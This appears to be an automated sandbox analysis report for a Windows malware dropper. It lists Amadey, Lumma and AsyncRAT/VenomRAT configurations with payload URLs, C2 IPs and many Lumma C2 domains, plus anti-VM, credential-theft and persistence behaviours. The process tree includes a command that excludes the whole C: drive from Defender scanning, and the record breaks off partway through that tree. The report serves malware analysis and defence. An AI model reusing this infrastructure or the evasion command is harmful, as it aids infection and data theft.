Analysis
-
max time kernel
108s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
14/03/2025, 02:21
Static task
static1
Behavioral task
behavioral1
Sample
11195c6b0d9981a94bdab08b52d714a2298e4e0bf98a613d62179bef8a701d00.exe
Resource
win7-20241010-en
General
-
Target
11195c6b0d9981a94bdab08b52d714a2298e4e0bf98a613d62179bef8a701d00.exe
-
Size
2.1MB
-
MD5
f48ff9bc196aad68da3d4376c9649d9f
-
SHA1
6e322f4efcc330514595db2b0d4b9c46f0947fa9
-
SHA256
11195c6b0d9981a94bdab08b52d714a2298e4e0bf98a613d62179bef8a701d00
-
SHA512
6be43cbad73eeb9da4ab465a36849943692c8e6d287716bc4f429fc58944f1c387bea3016d263d86e620ed1081cd5e2b3fff3434687bcd4531ec401186acf068
-
SSDEEP
24576:WxD0p+DGIp2aj46j8vwkKWzQO3UAjN9O249LYRE2ABbu6w+7s5SnPtEJW/0shuC3:SDNd4veApb5A7CWu6JvnPtEvaREkMU
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://absoulpushx.life/api
https://begindecafer.world/api
https://garagedrootz.top/api
https://9modelshiverd.icu/api
https://arisechairedd.shop/api
https://catterjur.run/api
https://orangemyther.live/api
https://fostinjec.today/api
https://sterpickced.digital/api
https://qcitydisco.bet/api
https://crosshairc.life/api
https://mrodularmall.top/api
https://jowinjoinery.icu/api
https://legenassedk.top/api
https://htardwarehu.icu/api
https://cjlaspcorne.icu/api
https://bugildbett.top/api
https://weaponrywo.digital/api
https://citydisco.bet/api
https://2weaponrywo.digital/api
https://featureccus.shop/api
https://fkmrodularmall.top/api
https://hlegenassedk.top/api
https://rcjlaspcorne.icu/api
https://latchclan.shop/api
https://rhtardwarehu.icu/api
https://.cocjkoonpillow.today/api
https://zfeatureccus.shop/api
https://yhtardwarehu.icu/api
Extracted
asyncrat
| Controller
Default
20.206.204.9:4449
ammmjprqjnqswrieh
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
146.19.191.210:4449
zjryrckbvvq
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Amadey family
-
Asyncrat family
-
Lumma family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral2/memory/7476-63267-0x000000001C9D0000-0x000000001CAE2000-memory.dmp family_stormkitty -
Stormkitty family
-
resource yara_rule behavioral2/files/0x0007000000023df7-63116.dat VenomRAT behavioral2/memory/7476-63128-0x0000000000660000-0x0000000000678000-memory.dmp VenomRAT behavioral2/files/0x000c000000023e16-63369.dat VenomRAT behavioral2/memory/7588-63390-0x00000000004B0000-0x00000000004C8000-memory.dmp VenomRAT -
Venomrat family
-
Async RAT payload 2 IoCs
resource yara_rule behavioral2/files/0x0007000000023df7-63116.dat family_asyncrat behavioral2/files/0x000c000000023e16-63369.dat family_asyncrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ s7MG2VL.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ OwPn5E9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 11195c6b0d9981a94bdab08b52d714a2298e4e0bf98a613d62179bef8a701d00.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7T7bCyA.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 115 7452 wscript.exe -
pid Process 8144 powershell.exe 9624 powershell.exe 10476 powershell.exe 7580 powershell.exe 11848 powershell.exe 8928 powershell.exe 6240 powershell.exe 1776 powershell.exe 4924 powershell.exe 14244 powershell.exe 5484 powershell.exe 14048 powershell.exe 9384 powershell.exe 9348 powershell.exe -
Downloads MZ/PE file 18 IoCs
flow pid Process 26 3584 rapes.exe 26 3584 rapes.exe 26 3584 rapes.exe 95 3584 rapes.exe 141 7992 svchost.exe 151 3584 rapes.exe 151 3584 rapes.exe 151 3584 rapes.exe 151 3584 rapes.exe 151 3584 rapes.exe 151 3584 rapes.exe 151 3584 rapes.exe 151 3584 rapes.exe 89 5092 svchost.exe 115 7452 wscript.exe 116 3584 rapes.exe 116 3584 rapes.exe 75 3584 rapes.exe -
Sets service image path in registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\8z5T4Z2m_4436\ImagePath = "\\??\\C:\\Windows\\Temp\\9friS_4436.sys" ps.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\OoU8i1_5856\ImagePath = "\\??\\C:\\Windows\\Temp\\OoU8i1_5856.sys" dbs.exe -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 11195c6b0d9981a94bdab08b52d714a2298e4e0bf98a613d62179bef8a701d00.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 11195c6b0d9981a94bdab08b52d714a2298e4e0bf98a613d62179bef8a701d00.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7T7bCyA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion s7MG2VL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion OwPn5E9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7T7bCyA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion s7MG2VL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion OwPn5E9.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation Go7yA2t.exe Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation 11195c6b0d9981a94bdab08b52d714a2298e4e0bf98a613d62179bef8a701d00.exe Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation st22BJg.exe Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation file.exe -
Executes dropped EXE 32 IoCs
pid Process 3584 rapes.exe 1080 rapes.exe 3712 7T7bCyA.exe 1120 s7MG2VL.exe 4140 ZqkKpwG.exe 1028 ZqkKpwG.exe 1304 eAzoDbY.exe 2104 eAzoDbY.exe 2660 eAzoDbY.exe 4352 8sb9w_003.exe 4436 ps.exe 640 cls.exe 7216 st22BJg.exe 7548 file.exe 1700 ShortcutTaskAgent.exe 8596 ShortcutTaskAgent.exe 9012 rapes.exe 9004 9CQknW9.exe 6328 7BzCs1a.exe 10920 7BzCs1a.exe 6476 Security Protection Windows.pif 6768 OpenCL.pif 6936 Go7yA2t.exe 7472 h2wb5_002.exe 7568 OpenCL.pif 8612 OwPn5E9.exe 5856 dbs.exe 5928 dbs.exe 13288 gtjFHJI.exe 12460 9JFiKVm.exe 7476 tZWlsuCjis.exe 5844 825c502f88.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 11195c6b0d9981a94bdab08b52d714a2298e4e0bf98a613d62179bef8a701d00.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 7T7bCyA.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine s7MG2VL.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine OwPn5E9.exe -
Loads dropped DLL 17 IoCs
pid Process 1700 ShortcutTaskAgent.exe 1700 ShortcutTaskAgent.exe 1700 ShortcutTaskAgent.exe 1700 ShortcutTaskAgent.exe 1700 ShortcutTaskAgent.exe 1700 ShortcutTaskAgent.exe 1700 ShortcutTaskAgent.exe 1700 ShortcutTaskAgent.exe 8596 ShortcutTaskAgent.exe 8596 ShortcutTaskAgent.exe 8596 ShortcutTaskAgent.exe 8596 ShortcutTaskAgent.exe 8596 ShortcutTaskAgent.exe 8596 ShortcutTaskAgent.exe 8596 ShortcutTaskAgent.exe 8596 ShortcutTaskAgent.exe 5372 pluginfast_Yj.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{F1A8D70E-81F9-4200-B46C-ECA432751942} = "C:\\ProgramData\\{044B9118-D09F-44DE-8820-983AA965DB95}\\dmcertinst.exe {65ECE49D-E44B-4E45-9F95-675677E13036}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{F1A8D70E-81F9-4200-B46C-ECA432751942} = "C:\\ProgramData\\{044B9118-D09F-44DE-8820-983AA965DB95}\\dmcertinst.exe {65ECE49D-E44B-4E45-9F95-675677E13036}" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{72BDFAD0-4420-47FB-9C89-9154DED998EB} = "C:\\ProgramData\\{DAC8D1F9-5E77-4EE7-B778-B19F65DAAE06}\\netbtugc.exe {0A8DF263-7B68-4A06-9AA8-2351D08B8A79}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{72BDFAD0-4420-47FB-9C89-9154DED998EB} = "C:\\ProgramData\\{DAC8D1F9-5E77-4EE7-B778-B19F65DAAE06}\\netbtugc.exe {0A8DF263-7B68-4A06-9AA8-2351D08B8A79}" svchost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 230 icanhazip.com 235 ip-api.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000500000002359c-63155.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 4956 11195c6b0d9981a94bdab08b52d714a2298e4e0bf98a613d62179bef8a701d00.exe 3584 rapes.exe 1080 rapes.exe 3712 7T7bCyA.exe 1120 s7MG2VL.exe 9012 rapes.exe 8612 OwPn5E9.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 4140 set thread context of 1028 4140 ZqkKpwG.exe 99 PID 1304 set thread context of 2660 1304 eAzoDbY.exe 103 PID 8596 set thread context of 6008 8596 ShortcutTaskAgent.exe 129 PID 6328 set thread context of 10920 6328 7BzCs1a.exe 140 PID 13288 set thread context of 14008 13288 gtjFHJI.exe 169 PID 12460 set thread context of 6844 12460 9JFiKVm.exe 173 -
resource yara_rule behavioral2/files/0x0008000000023d95-36517.dat upx behavioral2/memory/7216-36526-0x00000000002D0000-0x0000000000DDB000-memory.dmp upx behavioral2/memory/7216-36543-0x00000000002D0000-0x0000000000DDB000-memory.dmp upx behavioral2/memory/6476-36679-0x00000000002D0000-0x0000000000776000-memory.dmp upx behavioral2/memory/6476-36771-0x00000000002D0000-0x0000000000776000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job 11195c6b0d9981a94bdab08b52d714a2298e4e0bf98a613d62179bef8a701d00.exe -
Launches sc.exe 9 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 8160 sc.exe 8208 sc.exe 10472 sc.exe 11724 sc.exe 11648 sc.exe 12064 sc.exe 10688 sc.exe 11032 sc.exe 11512 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 4280 1304 WerFault.exe 100 3904 9004 WerFault.exe 132 -
System Location Discovery: System Language Discovery 1 TTPs 25 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ZqkKpwG.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8sb9w_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ShortcutTaskAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7BzCs1a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7BzCs1a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11195c6b0d9981a94bdab08b52d714a2298e4e0bf98a613d62179bef8a701d00.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7T7bCyA.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language s7MG2VL.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ZqkKpwG.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ShortcutTaskAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9CQknW9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language h2wb5_002.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eAzoDbY.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eAzoDbY.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language file.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OwPn5E9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 825c502f88.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 12468 cmd.exe 6460 netsh.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 11636 timeout.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4376 schtasks.exe 9612 schtasks.exe 7892 schtasks.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 115 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4956 11195c6b0d9981a94bdab08b52d714a2298e4e0bf98a613d62179bef8a701d00.exe 4956 11195c6b0d9981a94bdab08b52d714a2298e4e0bf98a613d62179bef8a701d00.exe 3584 rapes.exe 3584 rapes.exe 1080 rapes.exe 1080 rapes.exe 3712 7T7bCyA.exe 3712 7T7bCyA.exe 3712 7T7bCyA.exe 3712 7T7bCyA.exe 3712 7T7bCyA.exe 3712 7T7bCyA.exe 1120 s7MG2VL.exe 1120 s7MG2VL.exe 1120 s7MG2VL.exe 1120 s7MG2VL.exe 1120 s7MG2VL.exe 1120 s7MG2VL.exe 1028 ZqkKpwG.exe 1028 ZqkKpwG.exe 1028 ZqkKpwG.exe 1028 ZqkKpwG.exe 2660 eAzoDbY.exe 2660 eAzoDbY.exe 2660 eAzoDbY.exe 2660 eAzoDbY.exe 4924 powershell.exe 4924 powershell.exe 4924 powershell.exe 14244 powershell.exe 14244 powershell.exe 14244 powershell.exe 1700 ShortcutTaskAgent.exe 8596 ShortcutTaskAgent.exe 8596 ShortcutTaskAgent.exe 8596 ShortcutTaskAgent.exe 9012 rapes.exe 9012 rapes.exe 3456 powershell.exe 3456 powershell.exe 3456 powershell.exe 6008 cmd.exe 6008 cmd.exe 6008 cmd.exe 6008 cmd.exe 10920 7BzCs1a.exe 10920 7BzCs1a.exe 10920 7BzCs1a.exe 10920 7BzCs1a.exe 1776 powershell.exe 1776 powershell.exe 1776 powershell.exe 14048 powershell.exe 14048 powershell.exe 14048 powershell.exe 7580 powershell.exe 7580 powershell.exe 7580 powershell.exe 5484 powershell.exe 5484 powershell.exe 5484 powershell.exe 8612 OwPn5E9.exe 8612 OwPn5E9.exe 8612 OwPn5E9.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 4436 ps.exe 5856 dbs.exe -
Suspicious behavior: MapViewOfSection 8 IoCs
pid Process 4352 8sb9w_003.exe 4352 8sb9w_003.exe 4352 8sb9w_003.exe 8596 ShortcutTaskAgent.exe 7472 h2wb5_002.exe 7472 h2wb5_002.exe 7472 h2wb5_002.exe 6008 cmd.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 4924 powershell.exe Token: SeDebugPrivilege 14244 powershell.exe Token: SeLoadDriverPrivilege 4436 ps.exe Token: SeDebugPrivilege 3456 powershell.exe Token: SeDebugPrivilege 1776 powershell.exe Token: SeDebugPrivilege 14048 powershell.exe Token: SeDebugPrivilege 7580 powershell.exe Token: SeDebugPrivilege 5484 powershell.exe Token: SeDebugPrivilege 7476 tZWlsuCjis.exe Token: SeLoadDriverPrivilege 5856 dbs.exe Token: SeDebugPrivilege 5548 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 4956 11195c6b0d9981a94bdab08b52d714a2298e4e0bf98a613d62179bef8a701d00.exe 5844 825c502f88.exe 5844 825c502f88.exe 5844 825c502f88.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 5844 825c502f88.exe 5844 825c502f88.exe 5844 825c502f88.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 7476 tZWlsuCjis.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4956 wrote to memory of 3584 4956 11195c6b0d9981a94bdab08b52d714a2298e4e0bf98a613d62179bef8a701d00.exe 87 PID 4956 wrote to memory of 3584 4956 11195c6b0d9981a94bdab08b52d714a2298e4e0bf98a613d62179bef8a701d00.exe 87 PID 4956 wrote to memory of 3584 4956 11195c6b0d9981a94bdab08b52d714a2298e4e0bf98a613d62179bef8a701d00.exe 87 PID 3584 wrote to memory of 3712 3584 rapes.exe 94 PID 3584 wrote to memory of 3712 3584 rapes.exe 94 PID 3584 wrote to memory of 3712 3584 rapes.exe 94 PID 3584 wrote to memory of 1120 3584 rapes.exe 97 PID 3584 wrote to memory of 1120 3584 rapes.exe 97 PID 3584 wrote to memory of 1120 3584 rapes.exe 97 PID 3584 wrote to memory of 4140 3584 rapes.exe 98 PID 3584 wrote to memory of 4140 3584 rapes.exe 98 PID 3584 wrote to memory of 4140 3584 rapes.exe 98 PID 4140 wrote to memory of 1028 4140 ZqkKpwG.exe 99 PID 4140 wrote to memory of 1028 4140 ZqkKpwG.exe 99 PID 4140 wrote to memory of 1028 4140 ZqkKpwG.exe 99 PID 4140 wrote to memory of 1028 4140 ZqkKpwG.exe 99 PID 4140 wrote to memory of 1028 4140 ZqkKpwG.exe 99 PID 4140 wrote to memory of 1028 4140 ZqkKpwG.exe 99 PID 4140 wrote to memory of 1028 4140 ZqkKpwG.exe 99 PID 4140 wrote to memory of 1028 4140 ZqkKpwG.exe 99 PID 4140 wrote to memory of 1028 4140 ZqkKpwG.exe 99 PID 3584 wrote to memory of 1304 3584 rapes.exe 100 PID 3584 wrote to memory of 1304 3584 rapes.exe 100 PID 3584 wrote to memory of 1304 3584 rapes.exe 100 PID 1304 wrote to memory of 2104 1304 eAzoDbY.exe 102 PID 1304 wrote to memory of 2104 1304 eAzoDbY.exe 102 PID 1304 wrote to memory of 2104 1304 eAzoDbY.exe 102 PID 1304 wrote to memory of 2660 1304 eAzoDbY.exe 103 PID 1304 wrote to memory of 2660 1304 eAzoDbY.exe 103 PID 1304 wrote to memory of 2660 1304 eAzoDbY.exe 103 PID 1304 wrote to memory of 2660 1304 eAzoDbY.exe 103 PID 1304 wrote to memory of 2660 1304 eAzoDbY.exe 103 PID 1304 wrote to memory of 2660 1304 eAzoDbY.exe 103 PID 1304 wrote to memory of 2660 1304 eAzoDbY.exe 103 PID 1304 wrote to memory of 2660 1304 eAzoDbY.exe 103 PID 1304 wrote to memory of 2660 1304 eAzoDbY.exe 103 PID 3584 wrote to memory of 4352 3584 rapes.exe 108 PID 3584 wrote to memory of 4352 3584 rapes.exe 108 PID 3584 wrote to memory of 4352 3584 rapes.exe 108 PID 4352 wrote to memory of 1820 4352 8sb9w_003.exe 109 PID 4352 wrote to memory of 1820 4352 8sb9w_003.exe 109 PID 4352 wrote to memory of 5092 4352 8sb9w_003.exe 110 PID 4352 wrote to memory of 5092 4352 8sb9w_003.exe 110 PID 1820 wrote to memory of 4924 1820 cmd.exe 112 PID 1820 wrote to memory of 4924 1820 cmd.exe 112 PID 5092 wrote to memory of 4436 5092 svchost.exe 114 PID 5092 wrote to memory of 4436 5092 svchost.exe 114 PID 5092 wrote to memory of 640 5092 svchost.exe 115 PID 5092 wrote to memory of 640 5092 svchost.exe 115 PID 4436 wrote to memory of 14244 4436 ps.exe 117 PID 4436 wrote to memory of 14244 4436 ps.exe 117 PID 3584 wrote to memory of 7216 3584 rapes.exe 123 PID 3584 wrote to memory of 7216 3584 rapes.exe 123 PID 7216 wrote to memory of 7452 7216 st22BJg.exe 125 PID 7216 wrote to memory of 7452 7216 st22BJg.exe 125 PID 7216 wrote to memory of 7548 7216 st22BJg.exe 126 PID 7216 wrote to memory of 7548 7216 st22BJg.exe 126 PID 7216 wrote to memory of 7548 7216 st22BJg.exe 126 PID 7548 wrote to memory of 1700 7548 file.exe 127 PID 7548 wrote to memory of 1700 7548 file.exe 127 PID 7548 wrote to memory of 1700 7548 file.exe 127 PID 1700 wrote to memory of 8596 1700 ShortcutTaskAgent.exe 128 PID 1700 wrote to memory of 8596 1700 ShortcutTaskAgent.exe 128 PID 1700 wrote to memory of 8596 1700 ShortcutTaskAgent.exe 128 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\11195c6b0d9981a94bdab08b52d714a2298e4e0bf98a613d62179bef8a701d00.exe"C:\Users\Admin\AppData\Local\Temp\11195c6b0d9981a94bdab08b52d714a2298e4e0bf98a613d62179bef8a701d00.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3584 -
C:\Users\Admin\AppData\Local\Temp\10168510101\7T7bCyA.exe"C:\Users\Admin\AppData\Local\Temp\10168510101\7T7bCyA.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3712
-
-
C:\Users\Admin\AppData\Local\Temp\10171300101\s7MG2VL.exe"C:\Users\Admin\AppData\Local\Temp\10171300101\s7MG2VL.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1120
-
-
C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4140 -
C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1028
-
-
-
C:\Users\Admin\AppData\Local\Temp\10184340101\eAzoDbY.exe"C:\Users\Admin\AppData\Local\Temp\10184340101\eAzoDbY.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Users\Admin\AppData\Local\Temp\10184340101\eAzoDbY.exe"C:\Users\Admin\AppData\Local\Temp\10184340101\eAzoDbY.exe"4⤵
- Executes dropped EXE
PID:2104
-
-
C:\Users\Admin\AppData\Local\Temp\10184340101\eAzoDbY.exe"C:\Users\Admin\AppData\Local\Temp\10184340101\eAzoDbY.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 4164⤵
- Program crash
PID:4280
-
-
-
C:\Users\Admin\AppData\Local\Temp\10190860101\8sb9w_003.exe"C:\Users\Admin\AppData\Local\Temp\10190860101\8sb9w_003.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'4⤵
- Suspicious use of WriteProcessMemory
PID:1820 -
